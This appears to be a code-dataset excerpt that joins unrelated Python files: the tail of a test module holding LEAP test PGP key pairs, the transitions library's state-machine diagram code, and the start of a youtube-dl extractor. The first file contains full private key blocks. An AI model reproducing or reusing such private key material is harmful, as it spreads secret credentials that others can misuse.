iQHmz5C6zzS/kuabGdZyKRaZHt23WQ7JX/4zpjqbC99DjHcP9BSk7tJ8wI4bkMYD
uFVQdT9O6HwyKGYwUU4sAQRAj7XCTGvVbT0dpgJwH4RmrEtJoHAx4Whg8mJ710E0
GCmzf2jqkNuOw76ivgk27Kge+Hw00jmJjQhHY0yVbiaoJwcRrPKzaSjEVNgrpgP3
lXPRGQArgESsIOTeVVHQ8fhK2YtTeCY9rIiO+L0OX2xo9HK7hfHZZWL6rqymXdyS
fhzh/f6IPyHFWnvj7Brl7DR8heMikygcJqv+ed2yx7iLyCUJ10g12I48+aEj1aLe
dP7lna32iY8/Z0SHQLNH6PXO9SlPcq2aFUgKqE75A/0FMk7CunzU1OWr2ZtTLNO1
WT/13LfOhhuEq9jTyTosn0WxBjJKq18lnhzCXlaw6EAtbA7CUwsD3CTPR56aAXFK
3I7KXOVAqggrvMe5Tpdg5drfYpI8hZovL5aAgb+7Y5ta10TcJdUhS5K3kFAWe/td
U0cmWUMDP1UMSQ5Jg6JIQVWhSwARAQABiQIfBBgBCAAJBQJQvfnZAhsMAAoJEC9F
Xigk0Y3fRwsP/i0ElYCyxeLpWJTwo1iCLkMKz2yX1lFVa9nT1BVTPOQwr/IAc5OX
NdtbJ14fUsKL5pWgW8OmrXtwZm1y4euI1RPWWubG01ouzwnGzv26UcuHeqC5orZj
cOnKtL40y8VGMm8LoicVkRJH8blPORCnaLjdOtmA3rx/v2EXrJpSa3AhOy0ZSRXk
ZSrK68AVNwamHRoBSYyo0AtaXnkPX4+tmO8X8BPfj125IljubvwZPIW9VWR9UqCE
VPfDR1XKegVb6VStIywF7kmrknM1C5qUY28rdZYWgKorw01hBGV4jTW0cqde3N51
XT1jnIAa+NoXUM9uQoGYMiwrL7vNsLlyyiW5ayDyV92H/rIuiqhFgbJsHTlsm7I8
oGheR784BagAA1NIKD1qEO9T6Kz9lzlDaeWS5AUKeXrb7ZJLI1TTCIZx5/DxjLqM
Tt/RFBpVo9geZQrvLUqLAMwdaUvDXC2c6DaCPXTh65oCZj/hqzlJHH+RoTWWzKI+
BjXxgUWF9EmZUBrg68DSmI+9wuDFsjZ51BcqvJwxyfxtTaWhdoYqH/UQS+D1FP3/
diZHHlzwVwPICzM9ooNTgbrcDzyxRkIVqsVwBq7EtzcvgYUyX53yG25Giy6YQaQ2
ZtQ/VymwFL3XdUWV6B/hU4PVAFvO3qlOtdJ6TpE+nEWgcWjCv5g7RjXX
=MuOY
-----END PGP PUBLIC KEY BLOCK-----
"""
PRIVATE_KEY = """
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
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
=JTFu
-----END PGP PRIVATE KEY BLOCK-----
"""
# key 7FEE575A: public key "anotheruser <anotheruser@leap.se>"
KEY_FINGERPRINT_2 = "F6E2B572ADB84EA58BD2E9A57F9DFA687FEE575A"
PUBLIC_KEY_2 = """
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
mI0EUYwJXgEEAMbTKHuPJ5/Gk34l9Z06f+0WCXTDXdte1UBoDtZ1erAbudgC4MOR
gquKqoj3Hhw0/ILqJ88GcOJmKK/bEoIAuKaqlzDF7UAYpOsPZZYmtRfPC2pTCnXq
Z1vdeqLwTbUspqXflkCkFtfhGKMq5rH8GV5a3tXZkRWZhdNwhVXZagC3ABEBAAG0
IWFub3RoZXJ1c2VyIDxhbm90aGVydXNlckBsZWFwLnNlPoi4BBMBAgAiBQJRjAle
AhsDBgsJCAcDAgYVCAIJCgsEFgIDAQIeAQIXgAAKCRB/nfpof+5XWotuA/4tLN4E
gUr7IfLy2HkHAxzw7A4rqfMN92DIM9mZrDGaWRrOn3aVF7VU1UG7MDkHfPvp/cFw
ezoCw4s4IoHVc/pVlOkcHSyt4/Rfh248tYEJmFCJXGHpkK83VIKYJAithNccJ6Q4
JE/o06Mtf4uh/cA1HUL4a4ceqUhtpLJULLeKo7iNBFGMCV4BBADsyQI7GR0wSAxz
VayLjuPzgT+bjbFeymIhjuxKIEwnIKwYkovztW+4bbOcQs785k3Lp6RzvigTpQQt
Z/hwcLOqZbZw8t/24+D+Pq9mMP2uUvCFFqLlVvA6D3vKSQ/XNN+YB919WQ04jh63
yuRe94WenT1RJd6xU1aaUff4rKizuQARAQABiJ8EGAECAAkFAlGMCV4CGwwACgkQ
f536aH/uV1rPZQQAqCzRysOlu8ez7PuiBD4SebgRqWlxa1TF1ujzfLmuPivROZ2X
Kw5aQstxgGSjoB7tac49s0huh4X8XK+BtJBfU84JS8Jc2satlfwoyZ35LH6sDZck
I+RS/3we6zpMfHs3vvp9xgca6ZupQxivGtxlJs294TpJorx+mFFqbV17AzQ=
=Thdu
-----END PGP PUBLIC KEY BLOCK-----
"""
PRIVATE_KEY_2 = """
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
lQHYBFGMCV4BBADG0yh7jyefxpN+JfWdOn/tFgl0w13bXtVAaA7WdXqwG7nYAuDD
kYKriqqI9x4cNPyC6ifPBnDiZiiv2xKCALimqpcwxe1AGKTrD2WWJrUXzwtqUwp1
6mdb3Xqi8E21LKal35ZApBbX4RijKuax/BleWt7V2ZEVmYXTcIVV2WoAtwARAQAB
AAP7BLuSAx7tOohnimEs74ks8l/L6dOcsFQZj2bqs4AoY3jFe7bV0tHr4llypb/8
H3/DYvpf6DWnCjyUS1tTnXSW8JXtx01BUKaAufSmMNg9blKV6GGHlT/Whe9uVyks
7XHk/+9mebVMNJ/kNlqq2k+uWqJohzC8WWLRK+d1tBeqDsECANZmzltPaqUsGV5X
C3zszE3tUBgptV/mKnBtopKi+VH+t7K6fudGcG+bAcZDUoH/QVde52mIIjjIdLje
uajJuHUCAO1mqh+vPoGv4eBLV7iBo3XrunyGXiys4a39eomhxTy3YktQanjjx+ty
GltAGCs5PbWGO6/IRjjvd46wh53kzvsCAO0J97gsWhzLuFnkxFAJSPk7RRlyl7lI
1XS/x0Og6j9XHCyY1OYkfBm0to3UlCfkgirzCYlTYObCofzdKFIPDmSqHbQhYW5v
dGhlcnVzZXIgPGFub3RoZXJ1c2VyQGxlYXAuc2U+iLgEEwECACIFAlGMCV4CGwMG
CwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEH+d+mh/7ldai24D/i0s3gSBSvsh
8vLYeQcDHPDsDiup8w33YMgz2ZmsMZpZGs6fdpUXtVTVQbswOQd8++n9wXB7OgLD
izgigdVz+lWU6RwdLK3j9F+Hbjy1gQmYUIlcYemQrzdUgpgkCK2E1xwnpDgkT+jT
oy1/i6H9wDUdQvhrhx6pSG2kslQst4qjnQHYBFGMCV4BBADsyQI7GR0wSAxzVayL
juPzgT+bjbFeymIhjuxKIEwnIKwYkovztW+4bbOcQs785k3Lp6RzvigTpQQtZ/hw
cLOqZbZw8t/24+D+Pq9mMP2uUvCFFqLlVvA6D3vKSQ/XNN+YB919WQ04jh63yuRe
94WenT1RJd6xU1aaUff4rKizuQARAQABAAP9EyElqJ3dq3EErXwwT4mMnbd1SrVC
rUJrNWQZL59mm5oigS00uIyR0SvusOr+UzTtd8ysRuwHy5d/LAZsbjQStaOMBILx
77TJveOel0a1QK0YSMF2ywZMCKvquvjli4hAtWYz/EwfuzQN3t23jc5ny+GqmqD2
3FUxLJosFUfLNmECAO9KhVmJi+L9dswIs+2Dkjd1eiRQzNOEVffvYkGYZyKxNiXF
UA5kvyZcB4iAN9sWCybE4WHZ9jd4myGB0MPDGxkCAP1RsXJbbuD6zS7BXe5gwunO
2q4q7ptdSl/sJYQuTe1KNP5d/uGsvlcFfsYjpsopasPjFBIncc/2QThMKlhoEaEB
/0mVAxpT6SrEvUbJ18z7kna24SgMPr3OnPMxPGfvNLJY/Xv/A17YfoqjmByCvsKE
JCDjopXtmbcrZyoEZbEht9mko4ifBBgBAgAJBQJRjAleAhsMAAoJEH+d+mh/7lda
z2UEAKgs0crDpbvHs+z7ogQ+Enm4EalpcWtUxdbo83y5rj4r0TmdlysOWkLLcYBk
o6Ae7WnOPbNIboeF/FyvgbSQX1POCUvCXNrGrZX8KMmd+Sx+rA2XJCPkUv98Hus6
THx7N776fcYHGumbqUMYrxrcZSbNveE6SaK8fphRam1dewM0
=a5gs
-----END PGP PRIVATE KEY BLOCK-----
"""
| gpl-3.0 |
pytransitions/transitions | transitions/extensions/diagrams.py | 1 | 13658 | from transitions import Transition
from transitions.extensions.markup import MarkupMachine
from transitions.core import listify
import logging
from functools import partial
import copy
_LOGGER = logging.getLogger(__name__)
_LOGGER.addHandler(logging.NullHandler())
# this is a workaround for dill issues when partials and super is used in conjunction
# without it, Python 3.0 - 3.3 will not support pickling
# https://github.com/pytransitions/transitions/issues/236
_super = super
class TransitionGraphSupport(Transition):
""" Transition used in conjunction with (Nested)Graphs to update graphs whenever a transition is
conducted.
"""
def __init__(self, *args, **kwargs):
label = kwargs.pop('label', None)
_super(TransitionGraphSupport, self).__init__(*args, **kwargs)
if label:
self.label = label
def _change_state(self, event_data):
graph = event_data.machine.model_graphs[id(event_data.model)]
graph.reset_styling()
graph.set_previous_transition(self.source, self.dest, event_data.event.name)
_super(TransitionGraphSupport, self)._change_state(event_data) # pylint: disable=protected-access
graph = event_data.machine.model_graphs[id(event_data.model)] # graph might have changed during change_event
for state in _flatten(listify(getattr(event_data.model, event_data.machine.model_attribute))):
graph.set_node_style(self.dest if hasattr(state, 'name') else state, 'active')
class GraphMachine(MarkupMachine):
""" Extends transitions.core.Machine with graph support.
Is also used as a mixin for HierarchicalMachine.
Attributes:
_pickle_blacklist (list): Objects that should not/do not need to be pickled.
transition_cls (cls): TransitionGraphSupport
"""
_pickle_blacklist = ['model_graphs']
transition_cls = TransitionGraphSupport
machine_attributes = {
'directed': 'true',
'strict': 'false',
'rankdir': 'LR',
}
hierarchical_machine_attributes = {
'rankdir': 'TB',
'rank': 'source',
'nodesep': '1.5',
'compound': 'true'
}
style_attributes = {
'node': {
'': {},
'default': {
'style': 'rounded, filled',
'shape': 'rectangle',
'fillcolor': 'white',
'color': 'black',
'peripheries': '1'
},
'inactive': {
'fillcolor': 'white',
'color': 'black',
'peripheries': '1'
},
'parallel': {
'shape': 'rectangle',
'color': 'black',
'fillcolor': 'white',
'style': 'dashed, rounded, filled',
'peripheries': '1'
},
'active': {
'color': 'red',
'fillcolor': 'darksalmon',
'peripheries': '2'
},
'previous': {
'color': 'blue',
'fillcolor': 'azure2',
'peripheries': '1'
}
},
'edge': {
'': {},
'default': {
'color': 'black'
},
'previous': {
'color': 'blue'
}
},
'graph': {
'': {},
'default': {
'color': 'black',
'fillcolor': 'white',
'style': 'solid'
},
'previous': {
'color': 'blue',
'fillcolor': 'azure2',
'style': 'filled'
},
'active': {
'color': 'red',
'fillcolor': 'darksalmon',
'style': 'filled'
},
'parallel': {
'color': 'black',
'fillcolor': 'white',
'style': 'dotted'
}
}
}
# model_graphs cannot be pickled. Omit them.
def __getstate__(self):
# self.pkl_graphs = [(g.markup, g.custom_styles) for g in self.model_graphs]
return {k: v for k, v in self.__dict__.items() if k not in self._pickle_blacklist}
def __setstate__(self, state):
self.__dict__.update(state)
self.model_graphs = {} # reinitialize new model_graphs
for model in self.models:
try:
_ = self._get_graph(model, title=self.title)
except AttributeError as e:
_LOGGER.warning("Graph for model could not be initialized after pickling: %s", e)
def __init__(self, *args, **kwargs):
# remove graph config from keywords
self.title = kwargs.pop('title', 'State Machine')
self.show_conditions = kwargs.pop('show_conditions', False)
self.show_state_attributes = kwargs.pop('show_state_attributes', False)
# in MarkupMachine this switch is called 'with_auto_transitions'
# keep 'auto_transitions_markup' for backwards compatibility
kwargs['auto_transitions_markup'] = kwargs.get('auto_transitions_markup', False) or \
kwargs.pop('show_auto_transitions', False)
self.model_graphs = {}
# determine graph engine; if pygraphviz cannot be imported, fall back to graphviz
use_pygraphviz = kwargs.pop('use_pygraphviz', True)
if use_pygraphviz:
try:
import pygraphviz
except ImportError:
use_pygraphviz = False
self.graph_cls = self._init_graphviz_engine(use_pygraphviz)
_LOGGER.debug("Using graph engine %s", self.graph_cls)
_super(GraphMachine, self).__init__(*args, **kwargs)
# for backwards compatibility assign get_combined_graph to get_graph
# if model is not the machine
if not hasattr(self, 'get_graph'):
setattr(self, 'get_graph', self.get_combined_graph)
def _init_graphviz_engine(self, use_pygraphviz):
if use_pygraphviz:
try:
# state class needs to have a separator and machine needs to be a context manager
if hasattr(self.state_cls, 'separator') and hasattr(self, '__enter__'):
from .diagrams_pygraphviz import NestedGraph as Graph
self.machine_attributes.update(self.hierarchical_machine_attributes)
else:
from .diagrams_pygraphviz import Graph
return Graph
except ImportError:
pass
if hasattr(self.state_cls, 'separator') and hasattr(self, '__enter__'):
from .diagrams_graphviz import NestedGraph as Graph
self.machine_attributes.update(self.hierarchical_machine_attributes)
else:
from .diagrams_graphviz import Graph
return Graph
def _get_graph(self, model, title=None, force_new=False, show_roi=False):
if force_new:
grph = self.graph_cls(self, title=title if title is not None else self.title)
self.model_graphs[id(model)] = grph
try:
for state in _flatten(listify(getattr(model, self.model_attribute))):
grph.set_node_style(self.dest if hasattr(state, 'name') else state, 'active')
except AttributeError:
_LOGGER.info("Could not set active state of diagram")
try:
m = self.model_graphs[id(model)]
except KeyError:
_ = self._get_graph(model, title, force_new=True)
m = self.model_graphs[id(model)]
m.roi_state = getattr(model, self.model_attribute) if show_roi else None
return m.get_graph(title=title)
def get_combined_graph(self, title=None, force_new=False, show_roi=False):
""" This method is currently equivalent to 'get_graph' of the first machine's model.
In future releases of transitions, this function will return a combined graph with active states
of all models.
Args:
title (str): Title of the resulting graph.
force_new (bool): If set to True, (re-)generate the model's graph.
show_roi (bool): If set to True, only render states that are active and/or can be reached from
the current state.
Returns: AGraph of the first machine's model.
"""
_LOGGER.info('Returning graph of the first model. In future releases, this '
'method will return a combined graph of all models.')
return self._get_graph(self.models[0], title, force_new, show_roi)
def add_model(self, model, initial=None):
models = listify(model)
super(GraphMachine, self).add_model(models, initial)
for mod in models:
mod = self if mod == 'self' else mod
if hasattr(mod, 'get_graph'):
raise AttributeError('Model already has a get_graph attribute. Graph retrieval cannot be bound.')
setattr(mod, 'get_graph', partial(self._get_graph, mod))
_ = mod.get_graph(title=self.title, force_new=True) # initialises graph
def add_states(self, states, on_enter=None, on_exit=None,
ignore_invalid_triggers=None, **kwargs):
""" Calls the base method and regenerates all models's graphs. """
_super(GraphMachine, self).add_states(states, on_enter=on_enter, on_exit=on_exit,
ignore_invalid_triggers=ignore_invalid_triggers, **kwargs)
for model in self.models:
model.get_graph(force_new=True)
def add_transition(self, trigger, source, dest, conditions=None,
unless=None, before=None, after=None, prepare=None, **kwargs):
""" Calls the base method and regenerates all models's graphs. """
_super(GraphMachine, self).add_transition(trigger, source, dest, conditions=conditions, unless=unless,
before=before, after=after, prepare=prepare, **kwargs)
for model in self.models:
model.get_graph(force_new=True)
class BaseGraph(object):
def __init__(self, machine, title=None):
self.machine = machine
self.fsm_graph = None
self.roi_state = None
self.generate(title)
def _convert_state_attributes(self, state):
label = state.get('label', state['name'])
if self.machine.show_state_attributes:
if 'tags' in state:
label += ' [' + ', '.join(state['tags']) + ']'
if 'on_enter' in state:
label += r'\l- enter:\l + ' + r'\l + '.join(state['on_enter'])
if 'on_exit' in state:
label += r'\l- exit:\l + ' + r'\l + '.join(state['on_exit'])
if 'timeout' in state:
label += r'\l- timeout(' + state['timeout'] + 's) -> (' + ', '.join(state['on_timeout']) + ')'
return label
def _transition_label(self, tran):
edge_label = tran.get('label', tran['trigger'])
if 'dest' not in tran:
edge_label += " [internal]"
if self.machine.show_conditions and any(prop in tran for prop in ['conditions', 'unless']):
x = '{edge_label} [{conditions}]'.format(
edge_label=edge_label,
conditions=' & '.join(tran.get('conditions', []) + ['!' + u for u in tran.get('unless', [])]),
)
return x
return edge_label
def _get_global_name(self, path):
if path:
state = path.pop(0)
with self.machine(state):
return self._get_global_name(path)
else:
return self.machine.get_global_name()
def _get_elements(self):
states = []
transitions = []
try:
markup = self.machine.get_markup_config()
q = [([], markup)]
while q:
prefix, scope = q.pop(0)
for transition in scope.get('transitions', []):
if prefix:
t = copy.copy(transition)
t['source'] = self.machine.state_cls.separator.join(prefix + [t['source']])
if 'dest' in t: # don't do this for internal transitions
t['dest'] = self.machine.state_cls.separator.join(prefix + [t['dest']])
else:
t = transition
transitions.append(t)
for state in scope.get('children', []) + scope.get('states', []):
if not prefix:
s = state
states.append(s)
ini = state.get('initial', [])
if not isinstance(ini, list):
ini = ini.name if hasattr(ini, 'name') else ini
t = dict(trigger='',
source=self.machine.state_cls.separator.join(prefix + [state['name']]) + '_anchor',
dest=self.machine.state_cls.separator.join(prefix + [state['name'], ini]))
transitions.append(t)
if state.get('children', []):
q.append((prefix + [state['name']], state))
except KeyError as e:
_LOGGER.error("Graph creation incomplete!")
return states, transitions
def _flatten(item):
for elem in item:
if isinstance(elem, (list, tuple, set)):
for res in _flatten(elem):
yield res
else:
yield elem
| mit |
marcwebbie/youtube-dl | youtube_dl/extractor/biobiochiletv.py | 16 | 3367 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
remove_end,
)
from .rudo import RudoIE
class BioBioChileTVIE(InfoExtractor):
_VALID_URL = r'https?://(?:tv|www)\.biobiochile\.cl/(?:notas|noticias)/(?:[^/]+/)+(?P<id>[^/]+)\.shtml'
_TESTS = [{
